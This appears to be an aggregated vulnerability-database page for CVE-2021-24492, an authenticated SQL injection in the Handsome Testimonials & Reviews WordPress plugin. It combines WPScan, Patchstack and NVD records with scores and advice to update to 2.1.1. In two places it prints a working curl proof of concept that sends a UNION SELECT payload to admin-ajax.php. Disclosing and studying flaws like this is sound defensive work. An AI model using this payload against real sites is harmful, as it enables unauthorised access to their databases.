Description
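The hndtst_action_instance_callback AJAX call of the Handsome Testimonials & Reviews WordPress plugin, available to any authenticated user (Subscriber and above), does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to a SQL injection issue (CVE-2021-24492, CWE-89). Versions before 2.1.1 are affected; the related advisories give updating to at least 2.1.1 as the fix.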
Related
{"id": "WPEX-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection", "description": "The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.\n", "published": "2021-06-29T00:00:00", "modified": "2021-08-12T07:04:19", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "wpvulndb", "references": ["https://codevigilant.com/disclosure/2021/wp-plugin-handsome-testimonials/"], "cvelist": ["CVE-2021-24492"], "immutableFields": [], "lastseen": "2021-09-14T23:16:42", "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24492"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24492"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceData": "curl -i -s -k -X $'POST' \\\r\n -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: https://example.com' \\\r\n -b $'[any authenticated user]' \\\r\n --data-binary $'action=hndtst_previewShortcodeInstance&hndtst_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \\\r\n 
$'https://example.com/wp-admin/admin-ajax.php'", "generation": 0, "_state": {"dependencies": 1646147966}}
{"patchstack": [{"lastseen": "2022-06-01T19:31:45", "description": "Authenticated SQL Injection (SQLi) vulnerability discovered by Shreya Pohekar (Codevigilant Project) in WordPress Handsome Testimonials & Reviews (versions <= 2.1.0).\n\n## Solution\n\n\r\n Update the WordPress Handsome Testimonials & Reviews to the latest available version (at least 2.1.1).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T00:00:00", "type": "patchstack", "title": "WordPress Handsome Testimonials & Reviews <= 2.1.0 - Authenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24492"], "modified": "2021-06-29T00:00:00", "id": "PATCHSTACK:0202C05086E13B058EC63EFAEE29F075", "href": "https://patchstack.com/database/vulnerability/handsome-testimonials/wordpress-handsome-testimonials-reviews-2-1-0-authenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:55:44", "description": "The hndtst_action_instance_callback AJAX call of the Handsome Testimonials & Reviews 
WordPress plugin before 2.1.1, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:15:00", "type": "cve", "title": "CVE-2021-24492", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24492"], "modified": "2021-08-10T16:52:00", "cpe": [], "id": "CVE-2021-24492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24492", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-09-14T23:16:42", "description": "The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.\n\n### PoC\n\ncurl -i -s -k -X $'POST' \\ -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: https://example.com' \\ -b $'[any authenticated user]' \\ \\--data-binary $'action=hndtst_previewShortcodeInstance&hndtst;_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \\ $'https://example.com/wp-admin/admin-ajax.php'\n", "cvss3": {}, "published": "2021-06-29T00:00:00", "type": "wpvulndb", "title": "Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24492"], "modified": "2021-08-12T07:04:19", "id": "WPVDB-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA", "href": "https://wpscan.com/vulnerability/42760007-0e59-4d45-8d64-86bc0b8dacea", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}